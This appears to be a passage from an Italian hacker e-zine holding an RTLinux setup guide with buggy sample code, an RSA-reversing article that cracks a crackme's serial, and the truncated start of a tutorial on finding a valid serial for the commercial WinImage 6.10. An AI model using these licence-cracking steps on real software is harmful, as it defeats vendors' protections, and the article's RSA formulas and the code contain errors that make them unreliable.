7) API




1 - INTRODUZIONE
    ============


Inanzitutto  voglio  iniziare  questo  how-to  spiegando  cosa  si  intende  per
programmazione realtime. Il realtime interrompe il processo corrente per passare
le  risorse  fondamentali ad un processo con priorità più  alta.  RTLinux  è  un
kernel  realtime che lavora con il kernel di Linux. Con esso è possibile  creare
thread.  Questi  thread sono anche chiamati lightweight process  ossia  processi
leggeri,  in  quanto  condividono il loro spazio  di  indirizzamento,  mentre  i
processi  che  già  conosciamo allocano tutte le risorse necessarie  per  essere
eseguiti.  Lo  scopo  di creare applicazioni realtime, come  RTLinux  sta  nella
possibilità  di  dedicare  più operazioni a processi critici.  Un  kernel  linux
assegna  ad  ogni task a livello utente, un tempo limite di esecuzione  dopo  il
quale  le  risorse vengono assegnate ad un altro task e così via.  Se  però  sto
acquisendo  dati  con una scheda, questo approccio non garantisce  che  tutti  i
segnali siano acquisiti regolarmente, inoltre la CPU risolve e calcola algoritmi
di  codifica e decodifica applicati al segnale.  RTLinux va ad infilarsi tra  il
kernel  linux e l'hardware del calcolatore e modifica lo scheduling dei processi
sostituendo con uno a priorità fissa, assegnando priorità minima al kernel linux
che resta di fatto un task indipendente.

Kernel non realtime:

           +-------------------+
           |  PROCESSI UTENTE  |
           +-------------------+
                    |  |
                     \/
         +----------------------+  
         |  LIBRERIE DI SISTEMA |
  +------+                      +--------+     
  |  DEVICE DRIVER         LINUX KERNEL  |
  +--------------------------------------+
      ||        /\
      || I/O    || INTERRUPT
      ||        ||
      ||        ||
      \/        ||
  +---------------------------+
  |          HARDWARE         |
  +---------------------------+


Kernel realtime:   
                                             +--------------+
                                   ++--------| KERNEL LINUX |                                                                                                    ||        +--------------+
                                   ||          ||       /\
   +----------+                    ||          || I/O   || INTERRUPT SOFTWARE
   | RTL TASK |-------------++     ||          ||       ||
   +----------+             ||     ||          \/       ||
       ||          +--------\/-----\/---------------------+
       ||          |    ---------------                   |
       ||          |    |SCHEDULER RTL|                   |
       ||          |    ---------------                   |
       ||          |   					  |
       ||          |             RTLinux Plugin           |
       ||          +--------------------------------------+
       ||                                       /\
       \/                                       ||  INTERRUPT
   +------------------------------------------------------+
   | 							  |
   |    		   HARDWARE			  |
   |							  |
   +------------------------------------------------------+


RTLinux  in  pratica intercetta tutti gli interrupt hardware e  maschera  quelli
diretti  al  kernel linux che diventano interrupt software a bassa priorità.  Le
applicazioni  RTLinux non sono altro che moduli del kernel che vengono  caricati
in  memoria nello spazio ovvero nel kernel space; i processi RTLinux  non  fanno
uso  di  memoria virtuale perchè il processo viene bloccato nella memoria fisica
ed hanno accesso diretto all'hardware.

 COME INSTALLARE RTLINUX
 =========================

Naturalmente   i   prerequisiti   per  l'installazione   sono   ovviamente   una
distribuzione linux ed un kernel, (attualmente disponibile la versione 2.4.22 su
www.kernel.org)

A questo punto procediamo come segue:

1) Creare la directory /usr/scr/rtlinux:

   linux:~ # mkdir /usr/src/rtlinux

2) Copiare e decomprimere l'archivio compresso del kernel

   linux:/usr/src/rtlinux # tar xpjf linux-2.4.22.tar.bz2

3) Copiare e decomprimere l'archivio compresso di RTLinux

   linux:/usr/src/rtlinux # tar xpzf rtlinux-3.1.tar.gz

4) Notiamo che sul disco fisso vengono create due cartelle, una di nome linux  e
la  seconda di nome rtlinux-3.1. Ora dobbiamo    creare un link simbolico  nella
directory rtlinux-3.1 alla directory del kernel:

   linux:/usr/src/rtlinux/rtlinux-3.1 # ln -sf ../linux

5) Ora bisogna configurare il kernel non prima di averlo aggiornato con la patch
corretta.

   linux:/usr/src/rtlinux/rtlinux-3.1/linux # patch -pl < ../kernel_patch-2.4.22

6)  Compilare il kernel e gli eventuali moduli; quindi copiarlo nella  directory
/boot.

   linux:~ # make menuconfig

   linux:~ # make dep; make bzImage; make modules; make modules_install

   linux:~ # cp arch/i386/boot/bzImage/boot/vmlinuz-2.4.22-rtl


Ora  configurare  LILO o GRUB, dipende dalla vostra distribuzione,  verificatelo
prima  di procedere e riavviare il computer. Notare inoltre come nella directory
/usr/rtlinux  vengono  copiati i file di supporto ed i  file  oggetto.  Il  file
rtl.mk  contiene le variabili per una corretta compilazione dei  vostri  moduli.
Per poter testare la capacità realtime del kernel, nella sottodirectory examples
possiamo  trovare  degli esempi su come fare, non prima però di  avvere  avviato
rtlinux.

 COME AVVIARE RTLINUX
 =====================


RTLinux viene caricato e scaricato dalla memoria con lo script 'rtlinux'.

linux:~ # rtlinux start
Scheme: (-) not loaded, (+) loaded
        (+) mbuff
        (+) rtl
        (+) rtl_fifo
        (+) rtl_pisixio
        (+) rtl_sched
        (+) rtl_time


Se  non  ci sono errori tutti i moduli di base vengono caricati, inoltre  questi
moduli servono anche per poter sfruttare i FIFO (rtl_fifo e rtl_posixio) come la
memoria condivisa (mbuff).

linux:~ # rtlinux stop

Al  posto dei segni (+) compaiono tanti (-), lo stato di avvio dei moduli  viene
controllato con 'rtlinux status'


 COME TESTARE RTLINUX
 =====================
Inanzitutto  bisogna scrivere il codice sorgente come un modulo del  kernel,  il
file sorgente lo troviamo sul file hello_world_rtl.c

Per  compilare il file rtl.mk nella directory contenente il codice sorgente, per
esempio /root/rtl

linux: /root/rtl # cp /usr/rtlinux/rtl.mk Makefile

A questo punto modifichiamo il file aggiungendo le righe seguenti:

 # Makefile
 SOURCES = hello_world_rtl.c
 OBJEcTS = $(SOURCES:.c=.o)
 all : $(OBJECTS)
%.o : %.c
   $(CC) $(CFLAGS) $(INCLUDE) $(LIBS) -c $< -o $@
 clean :
         rm -f *.o


Compiliamo digitando il comando make:

linux:~ # make


Ora avviamo il codice:

linux:~ # rtlinux start hello_world_rtl


Ovviamente c'è la possibilità anche di scaricarlo:

linux:~ # rtlinux stop hello_world

Riporto di seguito il codice sorgente di hello_world_rtl.c


/*
 *
 * hello_world_rtl.c
*/
#ifndef __KERNEL__
#define __KERNEL__
#endif

#ifndef MODULE
#define MODULE
#endif

#include <rtl.h>
#include <time.h>
#include <pthread.h>
#include <linux/module.h>
#include <linux/errno.h>

pthread_t t;
pthread_t s;

static char *msg [] = {"Hello, ", "World!\n", NULL};
void *print_func (void *);
int init_module(void) {
        pthread_create (&t, NULL, print_func, (void *) msg [0]);
        pthread_create (&s, NULL, print_func, (void *) msg [1]);
        return 0;
}
void cleanup_module(void) {
       pthread_delete_np (t);
       pthread_delete_np (s);
}
void * print_func(void *msg)
{
        rtl_printf ("%s", (char *)msg);
}



Utilizzare  il comando dmesg per poter visualizzare l'output fornito  da  questo
modulo.  La  funzione  pthread_delete_np (non  portable)  elimina  i  thread  in
esecuzione  quando  il  modulo  viene  rimosso.  La  funzione  rtl_printf  viene
utilizzata  in sostituzione della printk perchè più sicura per la programmazione
con thread.




Come  codare un programma che  scrive su un FIFO i numeri interi da 0 a  9  in
ordine crescente
================================================================================



Mostriamo un programma in realtime che scrive su un FIFO i numeri interi da 0  a
9  in  ordine  crescente.  I  device FIFO (/dev/rtf0/dev/rtf63)  vengono  creati
automaticamente durante l'installazione di RTLinux.

Per compilare questo programma digitare:

linux:~ # gcc -wall -o app_fifo app_fifo.c

Riporto di seguito il codice sorgente:


/*
 * Listato 3
 * app_fifo.c
 */
#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <rtl_fifo.h>

int main () {
   int i, n, fifo;

   if ((fifo = open ("/dev/rtf0", O_RDONLY)) == -1) {
       printf ("Errore nella lettura del fifo.\n");
       exit (-1);
    }

   while (1) {
     if ((n = read (fifo, &i, sizeof (int))) === -1) {
         printf ("Errore nella lettura del fifo.\n");
         exit (-1);
      }
      printf ("Letto valore %d\n", i);


   }
   return 0;
}





Come  codare  un programma che apra un device FIFO e ne legge il contenuto  in
uscita
================================================================================


Questo  programma è un applicazione linux che apre un device FIFo e ne legge  il
contenuto  in  uscita,  questo sistema è un esempio  di  intercomunicazione  tra
processi. Oltre ai FIFO che sono unidirezionali, è possibile utilizzare  oggetti
Mutex, memoria condivisa e semafori.

Per compilare il programma digitare:

linux:~ # gcc -Wall -o fifo fifo.c

Riporto di seguito il codice sorgente del programma:


/*
 * fifo.c
 */
#ifndef __KERNEL__
#define __KERNEL__
#endif

#ifndef MODULE
#define MODULE
#endif

#include <rtl.h>
#include <rtl_fifo.h>
#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <linux/module.h>
#include <linux/errno.h>

#define SIZE_FIFO 256 /* buffer di 256 byte */

static pthread_t t;
static int fifo;

void * fifo_func (void *);

int init_module(void) {
   rtf_create (0, SIZE_FIFO); /* crea il FIFO */

   return pthread_create (&t, NULL,fifo_func, NULL);
}
void cleanup_module(void) {
       pthread_delete_np (t);
       close (fifo);
       rtf_destry (0); /* elimina il FIFO */
}
void * fifo_func(void *msg)
{
  int i = 0;
  struct sched_param p;

  p.sched_priority = 5 /* imposta la priorità del processo */
  pthread_setschedparam (t, SCHED_FIFO, &p);
  pthread_make_periodic_np (t, gethrtime (), 500000000; /* esegui 2 volte al secondo */

  fifo = open ("/dev/rtf0", O_NONBLOCK);

  while (1) {
      pthread_wait_np ();

      if (i > 9) {
          i=0;
      }
      write (0, &i, sizeof (int)); /* scrive nel FIFO */
      i++;
  }
}







  API
 =====


Che cosa sono le API di RTLinux ?

Api,  ovvero  Application  Programming Interface, sono  una  serie  di  funzioni
pensate  per  ogni ambiente di sviluppo. Le api che noi dovremmo  già  conoscere
sono  quelle  grafiche GTK+ come per esempio le QT sono delle  api  per  gestire
l'interfaccia  grafica.  I  task RTLinux invece sono moduli  che  funzionano  in
kernel  space  per  questo  alla classica funzione int  init_module  ()  e  void
cleanup_module  ().  La prima funzione carica il modulo  in  memoria  mentre  la
seconda  lo elimina da essa. I programmi che operano su questo file sono "insmod
<modulo>" e " rmmod <modulo>". Ogni thread di RTLinux occupa lo stesso spazio di
indirizzi  e  condivide  le risorse con gli altri thread lanciati  dal  processo
base.

Il  controllo  di  thread  viene  usato anche  nello  scheduling  ad  intervalli
prefissati.  La  communicazione fra thread avviene tramite  meccanismi  di  IPC,
ovvero  Internet  Process Communication come per esempio il  Mutex,  la  memoria
condivisa, realtime FIFO e i semafori.







          ::[ MARSIO ]::

    ___  ___ ___ ___  ____       
    | |  | | | || |  | | \       
    | |  | | | || |__| |  \      
    | |__| | | ||  __  | @ \     
     \____/  |_||_|  |_|_|\_\    
                                 

::[ Research & Development ]::
::[ Stage2 @ 2003 ]::
::[ www.uiha.tk ]::
::[marsio@securitynode.org]::]


+--------------------------------------------------------------[open the file]-+
|[ CRACK , REVERSING & CRITTOGRAFIA ]                                          | 
|-- RSA defeating 'n reversing                                                 |
|-- Evilcry <evilcry@virgilio.it>                                              |
|                     _________________________________________________________| 
|____________________/ 
RSA defeating 'n reversing

Questo  articolo  è  nato dalla fusione della mia esperienza con  qualche  altro
articolo trovato quà e là. Ringrazio l' admin di crackmes (Zer0) e gli altri  di
anticrack per i vari consigli.

RSA overview

Da  qualche tempo a questa parte, ho iniziato ad interessarmi di RSA, sia perchè
è  interessante  da  studiare  come sistema di crittografia,  sia  perchè  mi  è
capitato  in più di una protezione, ed inizialmente non sapevo nemmeno che  cosa
fosse!. L' Rsa è un cifrario a chiave pubblica nato al M.I.T. nel 1978, ad opera
di  Ron  Rivest,  Adi Shamir e Les Andleman (RSA deriva infatti dal  cognome  di
questi  3  ricercatori). L' Rsa è un crittosistema asimmetrico che  si  basa  su
alcune proprietà particolari che hanno i numeri primi. Questo sistema ha trovato
un vasto campo di utilizzo, algoritmi come El-Gamal (anche El-Gamal è un sistema
asimmetrico  e quindi abbastanza sicuro) sono diventati più rari, dato  il  loro
massiccio  utilizzo  in  passato.  Vediamo  adesso  un'  ipotetica  sessione  di
crypting:  nella quasi totalità dei casi il messaggio viene trasformato  in  Int
cioè in numero intero, e poi si tratta soprattutto di un discorso matematico. Il
primo passo per criptare un messaggio è :

n=p*q

N  come  si  può  notare dall' equazione ( meglio relazione  matematica),  è  il
prodotto  tra  p  e  q  che sono 2 numeri primi. Con la dovuta  cautela  si  può
affermare  che  più  piccoli  sono  P e Q è minore  è  la  sicurezza,  quindi  è
preferibile usare un modulo N abbastanza grande. Adesso va calcolato  Ô(n).  Per
far ciò si usa:

Ô(n)=(p-1)*(q-1)

Questa  è  un'  implementazione o più precisamente  estensione  del  teorema  di
Eulero. In pratica Ô(n), è un numero 'RELATIVAMENTE' primo a (p-1)*(q-1).  Ma  a
questo  punto qualcuno potrebbe chiedersi, che significa "relativamente  primo":
un  numero è relativamente primo ad un altro quando questi due numeri non  hanno
fattori in comune, tranne ovviamente 1. Ad esempio 8 e 21 non sono numeri primi,
però  8 e 21 saranno relativamente primi ad un altro numero cioè 1, dato che  l'
unico  fattore  comune a 8 e 21 è 1. Precisazione (i fattori di 8 sono  1,2,4,8,
quelli  di 21 sono 1,3,7,21). Spero di aver chiarito un pò questo concetto.  {{{
Tnx fly to CyberLaw}}}.

Un altro passo e siamo apposto. Molto semplicemente 'E' si ricava da:

e =Ô(n)

E  rappresenta la chiave (o meglio l' Esponente pubblico) con cui sarà  criptato
il  nostro  messaggio.  Perciò  E dev' essere un  numero  primo.  La  chiave  di
decrittazione d si ottiene attraverso:

d = e^(-1) mod ((p-1)*(q-1)) ------->Perciò dobbiamo conoscere 'e', 'p' e 'q'

Ok,  adesso  sappiamo  più  o meno come avviene una sessione  Rsa,  come  avrete
certamente notato durante quest' operazione ci sono dei valori che conosciamo  e
altri  che vanno scoperti (nel caso di un attacco). Possiamo crearci quindi  una
tabella che in seguto ci potrebbe essere d' aiuto.

+-----------------------------------------------------+
|P e Q    |    Sono numeri primi          | Incogniti |
|N        |    N è il prodotto di p*q     | Conosciuto|
|Ô(n)     |    Ô(n)=(p-1)*(q-1)           | Incognito |
|e        |    Chiave di cripto           | Incognita |
|d        |    Chiave di decripto         | Conosciuta|
+-----------------------------------------------------+

A  questa tabella si potrebbe aggiungere x (messaggio in chiaro) ed y (messaggio
criptato). Adesso siamo arrivati al cuore dell' algoritmo cioè alla strafamosa:

C=M^e mod n

Dove  M  è  il  messaggio da criptare e C è il messaggio  criptato.  Cercate  di
ricordarla  dato che è il nucleo dell' algoritmo. Spero che sappiate  ricavarivi
la  formula inversa in modo da ottenere il messaggio originale. La formula è  la
seguente:

M=C^d mod n

Siamo  alla fine della nostra panoramica sul Rsa, come avrete sicuramente notato
si  tratta  di un discorso principalmente matematico, ho cercato di sintetizzare
al massimo il discorso, vi ho risparmiato tutti i retroscena (teorema di Eulero,
Fermat)  o  si  sistemi di fattorizzazione tipo il Metodo della Curva  Ellittica
(buon  metodo  per  numeri  piccoli, se però siamo di fronte  a  numeri  grandi,
risulta  molto  lento), poi ci sono: Pollard's Monte Carlo Algorithm,  Continued
Fraction  Algorithm,  Trial  Division  (questo  è  il  più  vecchio  metodo   di
fattorizzazione  che  conosco). In questo periodo non  c'è  neanche  bisogno  di
sbattersi molto con calcoli, dato che ci sono tanti programmi (specialmente dopo
MIRACL) che fanno questo per noi.

Pratical RSA

In  questa  sezione iniziamo a fare pratica con il programma RsaTool2  (dei  The
Egoiste TMG) che ci sarà molto utile per il reversing. Per prima cosa, dopo aver
aperto  il  programma  settate  il Numer Base) a  10  (cioè  lavoriamo  in  base
decimale) , e verifichiamo la veridicità della formula:

n=p*q

Nel  riquadro  "Modulus N", inserite 47 e premete "Factor  N",  questo  dovrebbe
dirvi che è un numero primo, stessa cosa con 53. Adesso otteniamo N=2491 da  una
semplice moltiplicazione (47*53), facendo finta di non conoscere P e Q, mettiamo
2491 in "Modulus N", e vediamo cosa si ottiene se lo fattorizziamo. Il programma
ritorna esattamente in valori P e Q. Se andiamo un attimo a vedere la formula:

d = e^(-1) mod ((p-1)*(q-1))

vediamo che possiamo ricavarci anche la chiave di decripto D, avendo però P e Q,
mettiamo  i  valori P e Q nei loro relativi fields, e premiamo "Calc D",  adesso
sappiamo anche la chiave di decriptazione. Avendo il messaggio criptato,  adesso
possiamo decrittarlo. Per far questo basta applicare la formula:

M=(C^d) mod n

Possiamo  usare  la  stessa  calcolatrice  di  windows  per  decriptare   numeri
relativamente  piccoli, o meglio costruirci un programma che faccia  questo  per
noi.

La fattorizzazione (addendum)

Questa  piccola  sezione,  non  è  di  fondamentale  importanza  per  capire  l'
algoritmo,  ma  potrebbe  aiutarvi  a capire quali  sono  le  problematiche  più
importanti  di  un  attacco  a quest' ultimo. Come  spero  abbiate  capito,  per
riuscire a violare un codice protetto con Rsa dobbiamo FATTORIZZARE il modulo N.
Fin  quando si tratta di fattorizzare numeri piccoli non ci sono problemi, ma  i
problemi  sorgono quando si hanno davanti moduli N molto grossi, in questo  caso
vanno   usati   algoritmi  di  tipo  probabilistico.  Gli   algoritmi   per   la
fattorizzazione si dividono in due categorie:

-Algoritmi deterministici.

-Algoritmi  di  Montecarlo  (si basano su una scelta semi-casuale  dei  dati  di
partenza).

Più  precisamente gli algoritmi deterministici sono a loro volta divisi  in  tre
categorie:

-Algoritmi che restituiscono ad ogni tentativo riuscito un divisore proprio (sia
o non sia un numero primo)

-Algoritmi  che  per  ogni tentativo riuscito restituiscono SEMPRE  un  divisore
primo.

-Algoritmi  che ad ogni tentativo riuscito restituiscono un divisore  comune  al
numero dato.

L'  algoritmo  o  teorema  di Euclide, è quello che  viene  più  usato  per  gli
attacchi. La formula comunemente utilizzata è:

x=(x.a)(x.b)/(x.a.b) mod N

Sia  N=777 se si divide per 3 otteniamo 259 (che è >32), 259 si può dividere per
7  e  si ottiene 37 (che è < 72). I divisori primi di 259 perciò sono: 3, 7, 37.
Provate  a  fattorizzarlo con RsaTool2 ed otterrete gli stessi  fattori.  Questo
genere di algoritmi deterministici possono essere buoni (per buoni si intende la
rapidità  di risoluzione) per numeri piccoli, per risolvere numeri molto  grandi
vengono invece usati gli algoritmi di Montecarlo, cioè di tipo probabilistico.

{{Guardare le referenze a fine art.}}

Reversing corner

Ora  che  bene o male dovremmo aver acquistato una certa familiarità con  questo
algoritmo,  iniziamo a vedere qualche esempio pratico. Iniziamo con  un  crackme
abbastanza semplice ed utile. Io ho scelto il lockless 3CM, reperibile sul  sito
dei  lockless.  Per  prima  cosa  mettiamo  due  bpx  a  getdlgitemtexta  ed   a
getwindowtexta. Dopo che sice ha poppato dovremmo essere qui:

Reference To: USER32.GetDlgItemTextA

004137FE Call dword ptr [00428910]

00413804 jmp 00413819 ;Salta sotto

Referenced by a (U)nconditional or (C)onditional Jump at Address:

00413819 pop ebp

0041381A ret 000C

Dopo la chiamata a getdlgitemtexta e dopo il ret ci troveremo qui:

004029B0 push FFFFFFFF

004029B2 push 00419E18

004029B7 mov eax, dword ptr fs:[00000000]

004029BD push eax

004029BE mov dword ptr fs:[00000000], esp

004029C5 sub esp, 00000650

004029CB push esi

004029CC push edi

Possible  StringData  Ref  from Data Obj ->"9901" ; Questo  è  un  valore  molto
importante,

004029CD push 004200DC

004029D2 lea ecx, dword ptr [esp+000000E4]

004029D9  call  00401130 ;In questa call il numero 9901 viene "copiato"  in  un'
altra locazione

Possible   StringData   Ref  from  Data  Obj  ->"12790891";   Anche   questo   è
importantissimo|

004029DE push 004200D0

004029E3 lea ecx, dword ptr [esp+1C]

004029E7 mov dword ptr [esp+00000664], 00000000

004029F2 call 00401130 ;Chiamata alla solita call, che ora trasferisce 12790891

Possible  StringData  Ref from Data Obj ->"8483678" ;  Altro  valore  di  grande
importanza

004029F7 push 004200C8

004029FC lea ecx, dword ptr [esp+00000274]

00402A03 mov byte ptr [esp+00000664], 01

00402A0B call 00401130 ;Idem come sopra

Possible StringData Ref from Data Obj ->"5666933" ;Ultimo valore ma non di  meno
importante

00402A10 push 004200C0

00402A15 lea ecx, dword ptr [esp+000001AC]

00402A1C mov byte ptr [esp+00000664], 02

00402A24 call 00401130 ;viene richiamata la solita call

00402A29 mov edx, dword ptr [esp+00000668] ;Indirizzo relativo al serial

00402A30 or esi, FFFFFFFF ;

00402A33 mov edi, edx ;| Metodo molto comune usato per calcolare la lunghezza di
una stringa

00402A35 mov ecx, esi ;| in questo caso del nostro serial

00402A37 xor eax, eax ;|

00402A39 mov byte ptr [esp+00000660], 03 ;|

00402A41 repnz ;|

00402A42 scasb ;|

00402A43 not ecx ;|

00402A45 dec ecx ;|

00402A46 cmp ecx, 0000000E ;se il serial è diverso da Eh (cioè 14 chars)

00402A49 jne 00402BB2 ;Salta alla beggar off, sennò continua

00402A4F xor ecx, ecx

00402A51 mov al, byte ptr [ecx+edx] ;char relativo al serial

00402A54 cmp al, 30

00402A56 jl 00402BB2 ;Salta alla beggar off, se è più piccolo di 30, cioè 0

00402A5C cmp al, 39

00402A5E jg 00402BB2 ;Salta alla beggar off, se è più grande di 39 cioè 9

00402A64 inc ecx ;Incrementa il contatore

00402A65 cmp ecx, 0000000E

00402A68 jl 00402A51 ;Se è più piccolo di Eh, vai al prossimo ciclo

Adesso soffermiamoci per a fare qualche considerazione. All' inizio viene  preso
il  serial, invece che il name, e questo dovrebbe farci un pò pensare, perchè se
quello che viene manipolato è il serial, allora dobbiamo prepararci all' analisi
dell'  algoritmo.In questo caso fortunatamente sappiamo per certo che si  tratta
di rsa, e la cosa ci avvantaggia molto. Poi notiamo anche la presenza di quattro
numeri  fissi,  che  ci fa pensare (intuitivamente) a E  ed  N.  Vi  ricordo  la
formula:

C=M^e mod n

Inoltre a 00402a51 che inizia una routine che controlla se il seral inserito sia
un  numero,  se  non  lo è salta ad errore. Da questo ciclo  capiamo  anche  che
bisogna lavorare (operazioni di fattorizzazione e varie) in base 10. Arrivati  a
questo punto, è meglio se tralasciamo l' analisi della routine che segue, poichè
è  abbastanza lunga ed ingarbugliata. Cercherò quaindi di riassumervi un pò cosa
succede:

-Il  serial  dev' essere di 14 cifre, e poi durante l' algoritmo  questo  numero
verrà  "spezzato" in due parti uguali composte da 7 cifre. Ad ognuno  di  questi
"pezzi"  di  serial saranno applicate una seria di operazioni,  che  coinvolgono
anche in numeri visti sopra (9901 e 12790891). Alla fine, le due parti di serial
vengono riunite e poi avviene il check finale, che ci dirà se il serial è giusto
o  sbagliato.  Dalle operazioni che vengono fatte, possiamo capire che  12790891
rappresenta  il modulo N e che 9901 E. Adesso ci tocca riuscire a decriptare  le
due  parti  di serial. Seguendo la routine, si può notare inoltre che i  valori:
5666933  e  8483678,  sono le due parti di serial corretto,  ma  purtroppo  sono
criptati. Inoltre se avete notato entrambi i valori sono di 7 cifre ciascuno  il
che  dovrebbe  insospettirci.  Quindi arrivati a questo  punto,  facciamoci  uno
schema della situazione e vediamo cosa possiamo fare:

-Conosciamo il seriale corretto ma criptato, cioè conosciamo il parametro C.

-Conosciamo il modulo N con cui sono stati criptati i due valori.

-Conosciamo E (Con E e con P e Q si può trovare il parametro D).

Abbiamo  tutto  per  un  corretto decripting, ma dirvi  soltanto  quale  bottoni
premere  non sarebbe utile a nulla. Quindi cerchiamo di arrivare alla soluzione:
per  poter decriptare i due spezzoni di serial dobbiamo avere oltre al messaggio
criptato  (C) , il modulo N ed D. Se vi ricordate N è dato da P*Q che  sono  due
numeri primi, quindi fattorizzandolo dovremmo riuscire a trovare P e Q (2 numeri
in  questo caso relativamente piccoli). Aprite RsaTool2, ed impostatelo  a  base
10,  dato  che come abbiamo precendente visto i valori sono tutti  in  base  10.
Scrivete nell' edit box "Modulus N" e fattorizzatelo "Factor N", il programma vi
dirà che questo numero è primo, questo significa che non può essere il modulo  N
(che dovrebbe essere composto dal prodotto di due numeri primi), però dato che è
primo  può  essere  il nostro Esponete Pubblico E. Ora proviamo  a  fattorizzare
12790891,  e  da  cui otteniamo P (1667) e Q( 7673).. A questo  punto  dato  che
abbiamo P, Q e l' esponete pubblico E, possiamo calcolarci la chaive di decripto
D, che dipende dalla seguente formula:

d = e^(-1) mod ((p-1)*(q-1))

RsaTool2  ci  permette anche di calcolarci D, ricordatevi  di  mettere  9901  in
Public Exp, e poi premete "Calc D". Il valore di D sarà 10961333, adesso abbiamo
tutti gli elementi per poter applicare la formula:

M=C^d mod n

Non  sognatevi  nemmeno  di  usare  la calcolatrice  di  windows,  esistono  dei
programmi apposta per poter decriptare un numero. Vi consiglio di non effettuare
il  decripting  su un computer lento, ci vorrrebbe molto tempo.  Questi  sono  i
valori da usare per il decrypt:

M1=(8483678^10961333) mod 12790891

M2=(5666933^10961333) mod 12790891

Da cui si ottiene:

M1=7167622

M2=3196885

Queste  sono  le  due parti di serial decriptatato, se ricordate,  l'  algoritmo
richiedeva un serial di 14 cifre e successivamente veniva diviso in due,  M1  ed
M2  rappresentano  i 2 pezzi di serial. Quindi per ottenere il seriale  corretto
M1M2, vanno uniti. Il valore così ottenuto sarà 71676223196885.

Riconoscere l' Rsa.

Riconoscere l' Rsa negli schemi di protezione, non è molto semplice, poichè  può
presentarsi  sotto  numerose  forme, o peggio può  essere  "riadattato".  Ma  ho
pensato  di  elencarvi in modo molto generico le principali caratteristiche  che
*dovrebbe* avere:

-Viene preso il seriale e viene criptato, solitamente con la formula C=(M^E) mod
N, (M non è altro che il serial).

-Di conseguenza dovremo avere 2 valori fissi, che rappresentano il modulo N e l'
esponente pubblico E.

-Poi dovrebbe avvenire un confronto tra il serial criptato ed il nome.

Adesso voglio riportarvi un spezzone di codice preso da un crackme, che potrebbe
chiarirvi un pò le idee.

0040118D sub_40118D proc near

0040118D  mov ebx, eax ;In eax abbiamo il nostro serial, che ora vine  messo  in
ebx

0040118F mov ecx, dword_4030A8 ;in ecx viene messo un valore fisso

00401195 mov esi, dword_4030A4 ; in esi viene messo un altro valore fisso

0040119B mov eax, 1 ; mette 1 in eax

004011A0 loc_4011A0:

004011A0 cdq ;ConvertDoubleToQuad, si prepara ad un divisione

04011A1 mul ebx ; Moltiplica ebx per eax

004011A3 div esi ;divide esi per eax (in esi si trova uno dei valori fissi)

004011A5 mov eax, edx ;Sposta il resto della divisione in edx

004011A7  loop loc_4011A0 ; mette in loop queste operazioni, questo  ciclo  sarà
ripetuto 1109 volte, dato che ecx contiene proprio 1109!

dopo abbiamo un confronto tra il serial corretto ed il seriale inserito da noi e
criptato.

VALORI:

004030A4 = 0EAD2C511h cioè 3939681553

004030A8 = 455h cioè 1109

La  routine è abbastanza semplice, in ebx abbiamo il serial inserito da noi,  il
quale  viene  moltiplicato per eax (che la prima volta contiene 1) e  poi  viene
diviso  per esi (in esi abbiamo il valore 3939681553). Poi viene preso il  resto
della divisione (quindi possiamo considerarlo come un MOD!!!) e spostato in eax,
tutte  queste operazioni vengono ripetute 1109 volte!. Ormai avreste già  dovuto
capire di che operazione si tratta, ma comunque vediamo un pò analiticamete cosa
avviene:

eax=eax * ebx

dato che viene iterato per 1109 volte equivale a:

eax=(ebx ^ 1109)

di  seguito  abbiamo eax = eax / esi , ma poichè viene preso solo il  resto  può
essere considerato come:

eax MOD esi (da ricordare che esi è 3939681553)

Quindi da tutto questo si ricava che, C=(Seriale ^ 1109) MOD 3939681553

Bene!  abbiamo finito, ho cercato di scrivere qualcosa di sintetico  e  completo
allo  stesso tempo, spero di esserci riuscito. Nei vari schemi di protezione  l'
Rsa  si  può presentare in modo molto vario, noi abbiamo esaminato solo uno  dei
casi  più  semplici. La prossima volta (se ho tempo) scriverò qualcosa  su  come
viene usato l' rsa a 128, 256 e 512 bit.

References:

-Cenni di Aritmetica Superiore per la Crittologia, di Marco Frigerio

-Vari docs letti in giro.

Note finali

In  fine vorrei porgere i miei più cari saluti a chi mi ha insegnato qualcosa  e
chi  mi  ha aiutato a capire, o più semplicemente alle persone con le  quali  ho
passato delle ore piacevoli.

Evilcry


+--------------------------------------------------------------[open the file]-+
|[ CRACK , REVERSING & CRITTOGRAFIA ]                                          | 
|-- WinImage 6 10 ovvero uno schema di protezione deludente                    |
|-- Evilcry <evilcry@virgilio.it>                                              |
|                     _________________________________________________________| 
|____________________/ 
WinImage 6.10 ovvero uno schema di protezione deludente
DISCLAIMER
Le  informazioni contenute in questo tutorial sono solo a scopo informativo. Non
incoraggiamo nessuno a non registrare e/o pagare i programmi che usa.
WinImage?? non so nemmeno a cosa serve..... ihihih

Iniziamo  il nostro viaggio nelle viscere di WinImage :)). Dopo aver  installato
il  programma,  una  simpatica  NagScreen ci  avvisa  che  il  programma  non  è
registrato, e dopo 30 giorni smetterà di funzionare :)). Le vie per  evitare  la
sua  morte sono tante, si potrebbero rimuovere il/ i jump che decidono  se  sono
passati i 30 giorni (metodo mooolto lamero ed antipatico), o trovarci un seriale
valido  (è  la via che preferisco :)). Facciamo partire il programma ed  andiamo
sull'  Item 'Options', nel quale troveremo 'Registering'. Ora avremo  davanti  a
noi  il  classico  Name/Serial, quindi inseriamo un nome a  caso  (io  ho  messo
evilcry) ed un serial a caso (io ho scritto triton). Settiamo ora i canonici (ma
come  parlo oggi??? ihihi) bpx GetDlgItemTextA e bpx GetWindowTextA poi  usciamo
da  SICE con F5 e clickiamo su 'Register'. Il Sice poppa, ora premiamo una volta
F12 e ci troveremo davanti, qualcosa del genere:

0042204A  mov  ebx, 00453B90 ; Viene messo in ebx l' indirizzo  del  buffer  che
riceverà il nome

0042204F push ebx

00422050 push 00000816

00422055 push [ebp+08]

00422058 call esi ;Call a Getdlgitemtexta (bridge-call)

0042205C mov edi, 00453F00 ;In edi avremo l' indirizzo relativo al serial

00422061 push edi

00422062 push 00000817

00422067 push [ebp+08]

0042206A call esi ;Chiamata a getdlgitemtexta

0042206C push 0045386C

00422071 push edi ;Salva il puntatore al serial nello stack

00422072 push ebx ;Salva il puntatore al nome nello stack

00422073  call 0044208A ; Questa call la analizzeremo in seguito... dato  che  è
fondamentale

Fin  qui  non ci dovrebbero essere problemi :)) , il programma non fa altro  che
prendere  il nome ed il serial inserito (d ebx e d edi per credere), e  passarli
alla  call  00422073.  Dopo che siamo arrivati su questa call  premiamo  F8  per
